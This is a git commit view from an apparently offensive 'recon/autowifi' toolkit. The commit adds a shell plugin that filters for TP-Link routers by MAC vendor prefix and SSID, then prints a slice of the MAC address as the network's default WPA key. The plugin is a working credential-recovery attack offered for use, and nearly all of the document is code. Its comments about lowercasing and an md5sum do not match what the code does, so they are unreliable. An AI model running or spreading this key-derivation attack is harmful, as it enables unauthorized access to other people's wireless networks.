summaryrefslogtreecommitdiffstats
path: root/recon/autowifi/plugins/02tplink
diff options
context:
space:
mode:
authormakefu <github@syntax-fehler.de>2014-12-20 22:49:58 +0100
committermakefu <github@syntax-fehler.de>2014-12-20 22:49:58 +0100
commitb7ea9e035a729186afb57894891d3bdec43aa9ae (patch)
tree1d56cf8e00c536da4ecd4a2dff333b2b6233b9b9 /recon/autowifi/plugins/02tplink
parentd9cb390f1d29b2ff11ac0c3deae093f4d5232d54 (diff)
parentf0ee1f2a63be9238506ec15da655a6077caaa807 (diff)
Merge branch 'master' of ssh://github.com/krebscode/painload
Diffstat (limited to 'recon/autowifi/plugins/02tplink')
-rwxr-xr-xrecon/autowifi/plugins/02tplink17
1 files changed, 17 insertions, 0 deletions
diff --git a/recon/autowifi/plugins/02tplink b/recon/autowifi/plugins/02tplink
new file mode 100755
index 00000000..751ec209
--- /dev/null
+++ b/recon/autowifi/plugins/02tplink
@@ -0,0 +1,17 @@
+#!/bin/sh
+# Implementation of TP-Link default WPA Key
+# Based on
+# http://www.wardriving-forum.de/forum/f321/ezwlan-android-2-1-a-70045-4.html#post342481
+
+cd $(dirname $(readlink -f $0))
+. ./plugin_core
+
+parse_plugin_args "$@"
+
+! check_vendor_mac $VENDOR_MAC "F8D111" && echo "$VENDOR_MAC not affected" && exit 1
+! echo $ESSID | egrep -q '^tp' && echo "$ESSID not affected" && exit 1
+
+
+# printf always makes string to lower, need that for correct md5sum
+printf ${MAC:4:12}
+exit 0